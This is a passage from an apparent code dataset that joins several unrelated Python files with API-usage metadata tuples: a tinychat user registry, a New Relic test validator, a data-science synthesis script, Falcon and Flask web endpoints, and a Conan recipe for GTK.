(['base_dir'], {}), '(base_dir)\n', (1156, 1166), False, 'from create_python_app.create_requirements_file import create_requirements_file\n'), ((1171, 1198), 'create_python_app.create_setup_file.create_setup_file', 'create_setup_file', (['base_dir'], {}), '(base_dir)\n', (1188, 1198), False, 'from create_python_app.create_setup_file import create_setup_file\n'), ((1203, 1251), 'create_python_app.create_root_package.create_root_package', 'create_root_package', (['base_dir'], {'app_name': 'app_name'}), '(base_dir, app_name=app_name)\n', (1222, 1251), False, 'from create_python_app.create_root_package import create_root_package\n'), ((1256, 1285), 
'create_python_app.create_config_files.create_config_files', 'create_config_files', (['base_dir'], {}), '(base_dir)\n', (1275, 1285), False, 'from create_python_app.create_config_files import create_config_files\n'), ((1290, 1339), 'create_python_app.create_config_module.create_config_module', 'create_config_module', (['base_dir'], {'app_name': 'app_name'}), '(base_dir, app_name=app_name)\n', (1310, 1339), False, 'from create_python_app.create_config_module import create_config_module\n')] |
import time
class User:
    """State tinychat reports for a single room occupant.

    NOTE: the attributes driven by ``_KWARG_ATTRS`` are defaults that
    pinylib expects to find on every user object.
    """

    # (kwarg key, attribute name, default) triples pinylib relies on.
    _KWARG_ATTRS = (
        ('lf', 'lf', None),
        ('account', 'account', ''),
        ('own', 'is_owner', False),
        ('gp', 'gp', 0),
        ('alevel', 'alevel', ''),
        ('bf', 'bf', False),
        ('nick', 'nick', None),
        ('btype', 'btype', ''),
        ('id', 'id', -1),
        ('stype', 'stype', 0),
        ('mod', 'is_mod', False),
    )

    def __init__(self, **kwargs):
        for key, attr, default in self._KWARG_ATTRS:
            setattr(self, attr, kwargs.get(key, default))
        self.join_time = time.time()
        self.tinychat_id = None
        self.last_login = None
        self.user_level = 0
        # Extras (not part of the pinylib contract).
        self.last_msg = None
        self.screened = False
class Users:
    """Registry of the users currently in the room.

    Each nickname is a key in an internal dict whose value is a ``User``
    instance. Provides lookup, rename and removal operations.
    """

    def __init__(self):
        # nick -> User
        self._users = dict()

    @property
    def all(self):
        """dict: every user in the room, keyed by nickname."""
        return self._users

    @property
    def mods(self):
        """list of User: all moderators in the room."""
        return [u for u in self._users.values() if u.is_mod]

    @property
    def signed_in(self):
        """list of User: users signed in with an account."""
        return [u for u in self._users.values() if u.account]

    @property
    def nli(self):
        """list of User: not-logged-in users (no account)."""
        return [u for u in self._users.values() if not u.account]

    @property
    def lurkers(self):
        """list of User: all lurkers in the room."""
        return [u for u in self._users.values() if u.lf]

    @property
    def norms(self):
        """list of User: normal users (neither moderators nor lurkers)."""
        return [u for u in self._users.values()
                if not u.is_mod and not u.lf]

    def clear(self):
        """Delete all the users."""
        self._users.clear()

    def add(self, user_info):
        """Add a user to the registry, keyed by nickname.

        :param user_info: dict of tinychat user info (must contain 'nick').
        :return: the (possibly pre-existing) User object for that nick.
        """
        nick = user_info['nick']
        if nick not in self._users:
            self._users[nick] = User(**user_info)
        return self._users[nick]

    def change(self, old_nick, new_nick, user_info):
        """Change a user's nickname.

        Bug fix: the old entry used to be deleted *before* checking whether
        new_nick was already taken, losing the user on failure. The check
        now happens first, so on failure the registry is unchanged.

        :param old_nick: str, the user's current nickname.
        :param new_nick: str, the desired nickname.
        :param user_info: the user's User object.
        :return: True if changed, else False.
        """
        if old_nick not in self._users or new_nick in self._users:
            return False
        del self._users[old_nick]
        self._users[new_nick] = user_info
        return True

    def delete(self, user_name):
        """Remove a user by nickname.

        :param user_name: str, the nickname to remove.
        :return: True if removed, else False.
        """
        return self._users.pop(user_name, None) is not None

    def search(self, user_name):
        """Look up a user by nickname.

        :param user_name: str, the nickname to find.
        :return: the User object, or None if absent.
        """
        return self._users.get(user_name)

    def search_by_id(self, user_id):
        """Find the first user whose id matches ``user_id``.

        The whole registry is scanned before giving up, so None is only
        returned when no user matches (resolves the old TODO about an
        early return).

        :param user_id: str, the user id to match against str(User.id).
        :return: the User object, or None if no user matches.
        """
        for user in self._users.values():
            if str(user.id) == user_id:
                return user
        return None
| [
"time.time"
] | [((697, 708), 'time.time', 'time.time', ([], {}), '()\n', (706, 708), False, 'import time\n')] |
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from newrelic.common.encoding_utils import (serverless_payload_decode,
json_decode)
from newrelic.common.object_wrapper import (
transient_function_wrapper,
function_wrapper)
def validate_serverless_payload(count=1):
    """Decorator factory: assert that exactly ``count`` serverless payloads
    are finalized while the wrapped callable runs, and that each payload is
    a well-formed v1 ``NR_LAMBDA_MONITORING`` envelope.

    :param count: expected number of payloads produced per call.
    """
    @function_wrapper
    def _validate_wrapper(wrapped, instance, args, kwargs):
        # Payloads captured from ServerlessModeSession.finalize while
        # `wrapped` executes.
        payloads = []

        @transient_function_wrapper('newrelic.core.data_collector',
                'ServerlessModeSession.finalize')
        def _capture(wrapped, instance, args, kwargs):
            payload = wrapped(*args, **kwargs)
            payloads.append(payload)
            return payload

        def _validate():
            assert len(payloads) == count
            for payload in payloads:
                assert isinstance(payload, str)
                obj = json_decode(payload)
                assert len(obj) == 3, obj
                assert obj[0] == 1  # Version = 1
                assert obj[1] == 'NR_LAMBDA_MONITORING'  # Marker
                decoded = serverless_payload_decode(obj[2])
                # Keys should only contain metadata / data.
                # Bug fix: the comparison below was missing its `assert`,
                # so the key check silently never ran.
                assert set(decoded.keys()) == set(('metadata', 'data'))

        capture_wrapped = _capture(wrapped)
        result = capture_wrapped(*args, **kwargs)
        _validate()
        return result
    return _validate_wrapper
| [
"newrelic.common.object_wrapper.transient_function_wrapper",
"newrelic.common.encoding_utils.json_decode",
"newrelic.common.encoding_utils.serverless_payload_decode"
] | [((939, 1035), 'newrelic.common.object_wrapper.transient_function_wrapper', 'transient_function_wrapper', (['"""newrelic.core.data_collector"""', '"""ServerlessModeSession.finalize"""'], {}), "('newrelic.core.data_collector',\n 'ServerlessModeSession.finalize')\n", (965, 1035), False, 'from newrelic.common.object_wrapper import transient_function_wrapper, function_wrapper\n'), ((1391, 1411), 'newrelic.common.encoding_utils.json_decode', 'json_decode', (['payload'], {}), '(payload)\n', (1402, 1411), False, 'from newrelic.common.encoding_utils import serverless_payload_decode, json_decode\n'), ((1599, 1632), 'newrelic.common.encoding_utils.serverless_payload_decode', 'serverless_payload_decode', (['obj[2]'], {}), '(obj[2])\n', (1624, 1632), False, 'from newrelic.common.encoding_utils import serverless_payload_decode, json_decode\n')] |
import argparse
import logging
from pathlib import Path
import dask
import h5py
import joblib
import numpy as np
import pandas as pd
from dask.diagnostics import ProgressBar
from tqdm import tqdm
from dsconcept.get_metrics import (
get_cat_inds,
get_synth_preds,
load_category_models,
load_concept_models,
HierarchicalClassifier,
get_mets,
)
# Module-wide logging: configure the root handler once, then use a named
# logger for this script.
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
def main(
    experiment_name,
    synth_strat,
    in_cat_preds,
    out_store,
    synth_batch_size,
    t,
    out_synth_scores,
    limit=None,
    con_limit=None,
):
    """Synthesize concept predictions for the test split and score them.

    :param experiment_name: experiment id; selects data/model directories
    :param synth_strat: synthesis strategy name passed to get_synth_preds
    :param in_cat_preds: path to the .npy file of category predictions
    :param out_store: HDF5 store with "ground_truth"; receives "synthesis"
    :param synth_batch_size: batch size used while synthesizing
    :param t: threshold applied to the category predictions
    :param out_synth_scores: output CSV path for per-concept metric records
    :param limit: optional cap on the number of test records
    :param con_limit: optional cap on the number of concepts
    """
    test_inds = np.load(f"data/interim/{experiment_name}/test_inds.npy")
    feature_matrix = joblib.load(f"data/interim/{experiment_name}/feature_matrix.jbl")
    in_cat_models = Path(f"models/{experiment_name}/categories/models/")
    in_kwd_models = Path(f"models/{experiment_name}/keywords/models/")
    cat_preds = np.load(in_cat_preds)
    cat_clfs = load_category_models(in_cat_models)
    cd = load_concept_models(in_kwd_models)
    clf = HierarchicalClassifier(cat_clfs, cd)
    if limit is not None:
        LOG.info(f"Limiting to {limit} test records.")
        # NOTE(review): limiting assumes the row order of cat_preds matches
        # the order of test_inds -- confirm upstream.
        feature_matrix_test = feature_matrix.tocsc()[test_inds[0:limit], :]
        cat_preds = cat_preds[0:limit, :]
    else:
        feature_matrix_test = feature_matrix.tocsc()[test_inds, :]
    LOG.info(f'Synthesizing predictions with strategy "{synth_strat}".')
    all_cat_inds = get_cat_inds(clf.categories, cat_preds, t=t)
    if con_limit is not None:
        conwc = clf.concepts_with_classifiers[0:con_limit]
    else:
        conwc = clf.concepts_with_classifiers
    shape = (feature_matrix_test.shape[0], len(conwc))
    with tqdm(total=shape[0]) as pbar:
        get_synth_preds(
            out_store,
            shape,
            all_cat_inds,
            clf.categories,
            synth_batch_size,
            only_cat=False,
            synth_strat=synth_strat,
            con_limit=con_limit,
            limit=limit,
            pbar=pbar,
        )
    LOG.info("Obtaining metrics.")
    # Bug fix: Dataset.value was removed in h5py 3.0; read with [()] instead.
    # Also read both datasets under a single open of the read-only store
    # rather than opening the file twice.
    with h5py.File(out_store, "r") as f0:
        if limit is not None:
            target_values = f0["ground_truth"][0:limit, :]
        else:
            target_values = f0["ground_truth"][()]
        synth_preds = f0["synthesis"][()]
    jobs = []
    mets_pbar = tqdm(
        range(len(conwc)),
        total=len(conwc),
    )
    for i in mets_pbar:
        # Delay each per-concept metric computation; dask runs them in bulk.
        job = dask.delayed(get_mets)(
            i, synth_preds, target_values, conwc, mets_pbar
        )
        jobs.append(job)
    records = dask.compute(jobs)
    new_recs_df = pd.DataFrame(records[0])
    LOG.info(f"Saving results to {out_synth_scores}.")
    new_recs_df.to_csv(out_synth_scores)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Say hello")
parser.add_argument("--experiment_name", help="input txt file")
parser.add_argument("--synth_strat", help="input txt file")
parser.add_argument("--in_cat_preds", help="input txt file")
parser.add_argument("--store", help="input txt file")
parser.add_argument("--synth_batch_size", help="input txt file", type=int)
parser.add_argument("--threshold", help="input txt file", type=float)
parser.add_argument("--out_synth_scores", help="input txt file")
parser.add_argument(
"--limit", help="size for sample to test synthesis", type=int, default=None
)
parser.add_argument(
"--con_limit", help="size for concept sample", type=int, default=None
)
args = parser.parse_args()
main(
args.experiment_name,
args.synth_strat,
args.in_cat_preds,
args.store,
args.synth_batch_size,
args.threshold,
args.out_synth_scores,
args.limit,
args.con_limit,
)
| [
"logging.basicConfig",
"logging.getLogger",
"dsconcept.get_metrics.get_synth_preds",
"dask.delayed",
"dask.compute",
"pathlib.Path",
"argparse.ArgumentParser",
"dsconcept.get_metrics.get_cat_inds",
"dsconcept.get_metrics.load_concept_models",
"tqdm.tqdm",
"h5py.File",
"dsconcept.get_metrics.lo... | [((369, 408), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (388, 408), False, 'import logging\n'), ((415, 442), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (432, 442), False, 'import logging\n'), ((659, 715), 'numpy.load', 'np.load', (['f"""data/interim/{experiment_name}/test_inds.npy"""'], {}), "(f'data/interim/{experiment_name}/test_inds.npy')\n", (666, 715), True, 'import numpy as np\n'), ((737, 802), 'joblib.load', 'joblib.load', (['f"""data/interim/{experiment_name}/feature_matrix.jbl"""'], {}), "(f'data/interim/{experiment_name}/feature_matrix.jbl')\n", (748, 802), False, 'import joblib\n'), ((823, 875), 'pathlib.Path', 'Path', (['f"""models/{experiment_name}/categories/models/"""'], {}), "(f'models/{experiment_name}/categories/models/')\n", (827, 875), False, 'from pathlib import Path\n'), ((896, 946), 'pathlib.Path', 'Path', (['f"""models/{experiment_name}/keywords/models/"""'], {}), "(f'models/{experiment_name}/keywords/models/')\n", (900, 946), False, 'from pathlib import Path\n'), ((963, 984), 'numpy.load', 'np.load', (['in_cat_preds'], {}), '(in_cat_preds)\n', (970, 984), True, 'import numpy as np\n'), ((1041, 1076), 'dsconcept.get_metrics.load_category_models', 'load_category_models', (['in_cat_models'], {}), '(in_cat_models)\n', (1061, 1076), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((1086, 1120), 'dsconcept.get_metrics.load_concept_models', 'load_concept_models', (['in_kwd_models'], {}), '(in_kwd_models)\n', (1105, 1120), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((1131, 1167), 'dsconcept.get_metrics.HierarchicalClassifier', 'HierarchicalClassifier', (['cat_clfs', 'cd'], {}), '(cat_clfs, cd)\n', (1153, 
1167), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((1584, 1628), 'dsconcept.get_metrics.get_cat_inds', 'get_cat_inds', (['clf.categories', 'cat_preds'], {'t': 't'}), '(clf.categories, cat_preds, t=t)\n', (1596, 1628), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((2762, 2780), 'dask.compute', 'dask.compute', (['jobs'], {}), '(jobs)\n', (2774, 2780), False, 'import dask\n'), ((2799, 2823), 'pandas.DataFrame', 'pd.DataFrame', (['records[0]'], {}), '(records[0])\n', (2811, 2823), True, 'import pandas as pd\n'), ((2962, 3010), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Say hello"""'}), "(description='Say hello')\n", (2985, 3010), False, 'import argparse\n'), ((1838, 1858), 'tqdm.tqdm', 'tqdm', ([], {'total': 'shape[0]'}), '(total=shape[0])\n', (1842, 1858), False, 'from tqdm import tqdm\n'), ((1876, 2052), 'dsconcept.get_metrics.get_synth_preds', 'get_synth_preds', (['out_store', 'shape', 'all_cat_inds', 'clf.categories', 'synth_batch_size'], {'only_cat': '(False)', 'synth_strat': 'synth_strat', 'con_limit': 'con_limit', 'limit': 'limit', 'pbar': 'pbar'}), '(out_store, shape, all_cat_inds, clf.categories,\n synth_batch_size, only_cat=False, synth_strat=synth_strat, con_limit=\n con_limit, limit=limit, pbar=pbar)\n', (1891, 2052), False, 'from dsconcept.get_metrics import get_cat_inds, get_synth_preds, load_category_models, load_concept_models, HierarchicalClassifier, get_mets\n'), ((2220, 2245), 'h5py.File', 'h5py.File', (['out_store', '"""r"""'], {}), "(out_store, 'r')\n", (2229, 2245), False, 'import h5py\n'), ((2418, 2443), 'h5py.File', 'h5py.File', (['out_store', '"""r"""'], {}), "(out_store, 'r')\n", (2427, 2443), False, 'import h5py\n'), ((2629, 2651), 'dask.delayed', 'dask.delayed', (['get_mets'], {}), 
'(get_mets)\n', (2641, 2651), False, 'import dask\n')] |
"""Email module"""
#pylint: disable=too-few-public-methods
import json
import os
import falcon
import requests
from mako.template import Template
import sendgrid
from sendgrid.helpers.mail import Email, To, Content, Mail
from .hooks import validate_access
FROM_EMAIL = "<EMAIL>"
SUBJECT = "Appointment Offering"
SPREADSHEETS_MICROSERVICE_URL = os.environ.get("SPREADSHEETS_MICROSERVICE_URL")
SPREADSHEETS_MICROSERVICE_API_KEY = os.environ.get("SPREADSHEETS_MICROSERVICE_API_KEY")
SPREADSHEET_KEY = os.environ.get("SPREADSHEET_KEY")
SPREADSHEETS_ID_COL = "A"
SPREADSHEETS_RESPONSE_COL = "AL"
SITE_DOMAIN = os.environ.get("SITE_DOMAIN")
SENDGRID_API_KEY = os.environ.get('SENDGRID_API_KEY')
@falcon.before(validate_access)
class EmailOffer():
    """Falcon resource that emails an appointment offering to an applicant."""

    def on_post(self, _req, resp):
        #pylint: disable=no-self-use
        """
        Send an email offering a new appointment.

        Expects a JSON request body with keys: to, id, name, newDate,
        newTime, oldDate, oldTime.
        """
        request_body = _req.bounded_stream.read()
        request_params_json = json.loads(request_body)
        template = Template(filename="templates/appointment_offer.html")
        sg = sendgrid.SendGridAPIClient(api_key=SENDGRID_API_KEY) #pylint: disable=invalid-name
        from_email = Email(FROM_EMAIL)
        to_email = To(request_params_json.get("to"))
        content = Content("text/html", template.render(
            site=SITE_DOMAIN,
            id=request_params_json.get('id'),
            name=request_params_json.get('name'),
            newDate=request_params_json.get('newDate'),
            newTime=request_params_json.get('newTime'),
            oldDate=request_params_json.get('oldDate'),
            oldTime=request_params_json.get('oldTime')
        ))
        mail = Mail(from_email, to_email, SUBJECT, content)
        response = sg.client.mail.send.post(request_body=mail.get())
        print(response.status_code)
        print(response.body)
        print(response.headers)
        resp.body = response.body
        # Bug fix: falcon's Response uses `status`, not `status_code`;
        # the old `resp.status_code = ...` assignment had no effect on the
        # HTTP status line.
        resp.status = falcon.HTTP_200
class OfferResponse():
    """Falcon resource recording the applicant's response to an offer."""
    def on_get(self, _req, resp):
        #pylint: disable=no-self-use
        """
        Write the applicant's response ('action' query param) to the Google
        sheet row identified by the 'id' query param, then render a
        confirmation page. On an upstream HTTP error, mirror the upstream
        status code and JSON body back to the client.
        """
        try:
            data = create_spreadsheets_json()
            # The response value is written into the fixed response column.
            data["label_value_map"] = {
                SPREADSHEETS_RESPONSE_COL: _req.params.get('action')
            }
            print(data)
            response = requests.patch(
                url='{0}/rows/{1}'.format(SPREADSHEETS_MICROSERVICE_URL, _req.params.get('id')),
                headers=get_request_headers(),
                json=data
            )
            response.raise_for_status()
            resp.content_type = falcon.MEDIA_HTML
            template = Template(filename='templates/email_response.html')
            resp.body = template.render()
            resp.status = falcon.HTTP_200
        except requests.HTTPError as err:
            print("HTTPError:")
            print("{0} {1}".format(err.response.status_code, err.response.text))
            # Propagate the upstream status and body to the caller.
            resp.status = falcon.get_http_status(err.response.status_code)
            resp.body = json.dumps(err.response.json())
def get_request_headers():
    """Build the HTTP headers used to authenticate against the spreadsheets microservice."""
    api_headers = {"x-apikey": SPREADSHEETS_MICROSERVICE_API_KEY}
    return api_headers
def create_spreadsheets_json():
    """Assemble the base JSON payload identifying the target spreadsheet and its id column."""
    payload = {
        "spreadsheet_key": SPREADSHEET_KEY,
        "worksheet_title": "Sheet1",
        "id_column_label": SPREADSHEETS_ID_COL,
    }
    return payload
"json.loads",
"sendgrid.helpers.mail.Email",
"mako.template.Template",
"sendgrid.helpers.mail.Mail",
"falcon.get_http_status",
"sendgrid.SendGridAPIClient",
"os.environ.get",
"falcon.before"
] | [((345, 392), 'os.environ.get', 'os.environ.get', (['"""SPREADSHEETS_MICROSERVICE_URL"""'], {}), "('SPREADSHEETS_MICROSERVICE_URL')\n", (359, 392), False, 'import os\n'), ((429, 480), 'os.environ.get', 'os.environ.get', (['"""SPREADSHEETS_MICROSERVICE_API_KEY"""'], {}), "('SPREADSHEETS_MICROSERVICE_API_KEY')\n", (443, 480), False, 'import os\n'), ((499, 532), 'os.environ.get', 'os.environ.get', (['"""SPREADSHEET_KEY"""'], {}), "('SPREADSHEET_KEY')\n", (513, 532), False, 'import os\n'), ((606, 635), 'os.environ.get', 'os.environ.get', (['"""SITE_DOMAIN"""'], {}), "('SITE_DOMAIN')\n", (620, 635), False, 'import os\n'), ((655, 689), 'os.environ.get', 'os.environ.get', (['"""SENDGRID_API_KEY"""'], {}), "('SENDGRID_API_KEY')\n", (669, 689), False, 'import os\n'), ((692, 722), 'falcon.before', 'falcon.before', (['validate_access'], {}), '(validate_access)\n', (705, 722), False, 'import falcon\n'), ((996, 1020), 'json.loads', 'json.loads', (['request_body'], {}), '(request_body)\n', (1006, 1020), False, 'import json\n'), ((1040, 1093), 'mako.template.Template', 'Template', ([], {'filename': '"""templates/appointment_offer.html"""'}), "(filename='templates/appointment_offer.html')\n", (1048, 1093), False, 'from mako.template import Template\n'), ((1108, 1160), 'sendgrid.SendGridAPIClient', 'sendgrid.SendGridAPIClient', ([], {'api_key': 'SENDGRID_API_KEY'}), '(api_key=SENDGRID_API_KEY)\n', (1134, 1160), False, 'import sendgrid\n'), ((1212, 1229), 'sendgrid.helpers.mail.Email', 'Email', (['FROM_EMAIL'], {}), '(FROM_EMAIL)\n', (1217, 1229), False, 'from sendgrid.helpers.mail import Email, To, Content, Mail\n'), ((1714, 1758), 'sendgrid.helpers.mail.Mail', 'Mail', (['from_email', 'to_email', 'SUBJECT', 'content'], {}), '(from_email, to_email, SUBJECT, content)\n', (1718, 1758), False, 'from sendgrid.helpers.mail import Email, To, Content, Mail\n'), ((2760, 2810), 'mako.template.Template', 'Template', ([], {'filename': '"""templates/email_response.html"""'}), 
"(filename='templates/email_response.html')\n", (2768, 2810), False, 'from mako.template import Template\n'), ((3076, 3124), 'falcon.get_http_status', 'falcon.get_http_status', (['err.response.status_code'], {}), '(err.response.status_code)\n', (3098, 3124), False, 'import falcon\n')] |
from flask import Flask, request
from flask import render_template
from flask_mysqldb import MySQL
import TimeCalc
from datetime import datetime, timedelta
app = Flask(__name__)
# MySQL connection settings for the `trucks` database.
# NOTE(review): credentials are hard-coded here; presumably they should be
# loaded from the environment or a config file -- confirm before deploying.
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'password'
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_DB'] = 'trucks'
# DictCursor makes fetchall() return rows as dicts keyed by column name.
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
mysql = MySQL(app)
@app.route('/', methods=['GET', 'POST'])
def home():
    """Render the home page listing trucks currently on site.

    Fetches all on-site trucks plus arrival/departure times from the last
    12 hours, estimates each truck's wait time via TimeCalc, and annotates
    every row with its predicted finish time and the hours remaining.
    """
    cur = mysql.connection.cursor()
    cur.execute('''SELECT * FROM on_site''')
    onSite = cur.fetchall()
    cur.execute('SELECT time_in, time_out FROM archive WHERE time_in >= DATE_ADD(NOW(), INTERVAL -12 HOUR);')
    prevTimes = cur.fetchall()
    cur.close()  # release the cursor once all queries are done
    wait_times = TimeCalc.CalculateWaitTime(prevTimes, onSite)
    # Pair each on-site row with its estimated wait time; zip replaces the
    # manual index bookkeeping of the original loop.
    for row, wait in zip(onSite, wait_times):
        # hours remaining until the predicted finish time (negative if overdue)
        hours = (wait - datetime.now()).total_seconds() / 3600
        row.update({'wait_time': wait, 'time_remaining': hours})
    return render_template('home.html', data=onSite, wait_times=wait_times, curr_time=datetime.now())
@app.route('/archive/', methods=['POST', 'GET'])
def archive():
    """Search the archive table with optional date-range and location filters.

    GET renders an empty page; POST runs the filtered query and, when the
    requested output mode is 'screen', renders the matching rows.
    """
    cur = mysql.connection.cursor()
    if request.method == 'POST':
        output = request.form['output']
        date = request.form['date']
        print('DATE IS ')
        print(date)
        # Whitelisted date ranges mapped onto fixed SQL fragments; 'ALL' (or
        # any unrecognized value) applies no date filter.  The original code
        # produced broken SQL ("FROM archive AND ...") for unknown dates.
        date_filters = {
            'yesterday': 'time_in >= DATE_ADD(NOW(), INTERVAL -1 DAY)',
            'lastWeek': 'time_in >= DATE_ADD(NOW(), INTERVAL -7 DAY)',
            'last3Month': 'time_in >= DATE_ADD(NOW(), INTERVAL -90 DAY)',
            'last6Month': 'time_in >= DATE_ADD(NOW(), INTERVAL -180 DAY)',
            'lastYear': 'time_in >= DATE_ADD(NOW(), INTERVAL -365 DAY)',
        }
        conditions = []
        params = []
        if date in date_filters:
            conditions.append(date_filters[date])
        location = request.form['location']
        if location != 'ALL':
            # SECURITY FIX: the location value comes straight from the form;
            # bind it as a query parameter instead of concatenating it into
            # the SQL string (previously an SQL-injection vector).
            conditions.append('location=%s')
            params.append(location)
        query = 'SELECT * FROM archive '
        if conditions:
            query += 'WHERE ' + ' AND '.join(conditions) + ' '
        query += ';'
        print(query)
        cur.execute(query, params)
        data = cur.fetchall()
        if output == 'screen':
            return render_template('archive.html', data=data)
    return render_template('archive.html', data=None)
| [
"flask.render_template",
"TimeCalc.CalculateWaitTime",
"flask_mysqldb.MySQL",
"flask.Flask",
"datetime.datetime.now"
] | [((163, 178), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (168, 178), False, 'from flask import Flask, request\n'), ((384, 394), 'flask_mysqldb.MySQL', 'MySQL', (['app'], {}), '(app)\n', (389, 394), False, 'from flask_mysqldb import MySQL\n'), ((723, 768), 'TimeCalc.CalculateWaitTime', 'TimeCalc.CalculateWaitTime', (['prevTimes', 'onSite'], {}), '(prevTimes, onSite)\n', (749, 768), False, 'import TimeCalc\n'), ((2803, 2845), 'flask.render_template', 'render_template', (['"""archive.html"""'], {'data': 'None'}), "('archive.html', data=None)\n", (2818, 2845), False, 'from flask import render_template\n'), ((1083, 1097), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1095, 1097), False, 'from datetime import datetime, timedelta\n'), ((2747, 2789), 'flask.render_template', 'render_template', (['"""archive.html"""'], {'data': 'data'}), "('archive.html', data=data)\n", (2762, 2789), False, 'from flask import render_template\n'), ((851, 865), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (863, 865), False, 'from datetime import datetime, timedelta\n')] |
from conans import ConanFile, Meson, tools
from conans.errors import ConanInvalidConfiguration
import os
class LibnameConan(ConanFile):
    """Conan recipe that builds GTK from source with Meson."""
    name = "gtk"
    description = "libraries used for creating graphical user interfaces for applications."
    topics = ("conan", "gtk", "widgets")
    url = "https://github.com/bincrafters/conan-gtk"
    homepage = "https://www.gtk.org"
    license = "LGPL-2.1-or-later"
    generators = "pkg_config"
    settings = "os", "arch", "compiler", "build_type"
    options = {
        "shared": [True, False],
        "fPIC": [True, False],
        "with_wayland": [True, False],
        "with_x11": [True, False],
        "with_pango": [True, False]
    }
    default_options = {
        "shared": True,
        "fPIC": True,
        "with_wayland": False,
        "with_x11": True,
        "with_pango": True}
    # Subfolders (relative to the recipe folder) holding sources and build tree.
    _source_subfolder = "source_subfolder"
    _build_subfolder = "build_subfolder"
    def config_options(self):
        """Drop options that do not apply to the target OS."""
        if self.settings.os == "Windows":
            # fPIC is meaningless on Windows
            del self.options.fPIC
        if self.settings.os != "Linux":
            # The Wayland/X11 backends only exist on Linux
            del self.options.with_wayland
            del self.options.with_x11
    def build_requirements(self):
        """Declare build-time tool dependencies (Meson, and pkgconf if pkg-config is absent)."""
        self.build_requires("meson/0.56.0")
        if not tools.which('pkg-config'):
            self.build_requires("pkgconf/1.7.3")
    def requirements(self):
        """Declare library dependencies, conditionally per backend option."""
        self.requires("gdk-pixbuf/2.42.0")
        self.requires("glib/2.67.0")
        self.requires("cairo/1.17.2")
        self.requires("graphene/1.10.2")
        if self.settings.os == "Linux":
            self.requires("xkbcommon/1.0.3")
            if self.options.with_wayland:
                self.requires("wayland") # FIXME: Create an actual Wayland package(s)
            if self.options.with_x11:
                self.requires("xorg/system")
        self.requires("libepoxy/1.5.4")
        if self.options.with_pango:
            self.requires("pango/1.48.0")
    def system_requirements(self):
        """Install required system packages (sassc) via apt on Linux hosts."""
        if self.settings.os == 'Linux' and tools.os_info.is_linux:
            if tools.os_info.with_apt:
                installer = tools.SystemPackageTool()
                packages = ['sassc']
                for package in packages:
                    installer.install(package)
    def configure(self):
        """Validate the option combination and strip C++-only settings (GTK is a C library)."""
        del self.settings.compiler.libcxx
        del self.settings.compiler.cppstd
        if self.settings.os == "Linux":
            if self.options.with_wayland or self.options.with_x11:
                if not self.options.with_pango:
                    raise ConanInvalidConfiguration("with_pango option is mandatory when with_wayland or with_x11 is used")
        if self.settings.os == "Windows":
            raise ConanInvalidConfiguration("GTK recipe is not yet compatible with Windows. Contributions are welcome.")
    def source(self):
        """Download and unpack the GTK sources into the source subfolder."""
        tools.get(**self.conan_data["sources"][self.version])
        extracted_dir = self.name + "-" + self.version
        os.rename(extracted_dir, self._source_subfolder)
    def _configure_meson(self):
        """Create a Meson configuration with backend/feature flags derived from the options."""
        meson = Meson(self)
        defs = {}
        if self.settings.os == "Linux":
            defs["wayland-backend"] = "true" if self.options.with_wayland else "false"
            defs["x11-backend"] = "true" if self.options.with_x11 else "false"
        # Disable everything that is not needed for a library-only package.
        defs["introspection"] = "disabled"
        defs["documentation"] = "false"
        defs["man-pages"] = "false"
        defs["build-tests"] = "false"
        defs["build-examples"] = "false"
        defs["demos"] = "false"
        args=[]
        # Use Conan-provided dependencies instead of Meson subproject fallbacks.
        args.append("--wrap-mode=nofallback")
        meson.configure(defs=defs, build_folder=self._build_subfolder, source_folder=self._source_subfolder, pkg_config_paths=[self.install_folder], args=args)
        return meson
    def build(self):
        """Build GTK with Meson inside the Conan run environment."""
        with tools.environment_append(tools.RunEnvironment(self).vars):
            meson = self._configure_meson()
            meson.build()
    def package(self):
        """Run the Meson install step and copy license, headers and libraries into the package."""
        self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
        meson = self._configure_meson()
        with tools.environment_append({
            "PKG_CONFIG_PATH": self.install_folder,
            "PATH": [os.path.join(self.package_folder, "bin")]}):
            meson.install()
        # If the CMakeLists.txt has a proper install method, the steps below may be redundant
        # If so, you can just remove the lines below
        include_folder = os.path.join(self._source_subfolder, "include")
        self.copy(pattern="*", dst="include", src=include_folder)
        self.copy(pattern="*.dll", dst="bin", keep_path=False)
        self.copy(pattern="*.lib", dst="lib", keep_path=False)
        self.copy(pattern="*.a", dst="lib", keep_path=False)
        self.copy(pattern="*.so*", dst="lib", keep_path=False)
        self.copy(pattern="*.dylib", dst="lib", keep_path=False)
    def package_info(self):
        """Expose link libraries, include dirs and the pkg-config name to consumers."""
        self.cpp_info.libs = tools.collect_libs(self)
        self.cpp_info.includedirs.append(os.path.join("include", "gtk-4.0"))
        # NOTE(review): the include dir above targets gtk-4.0 but the
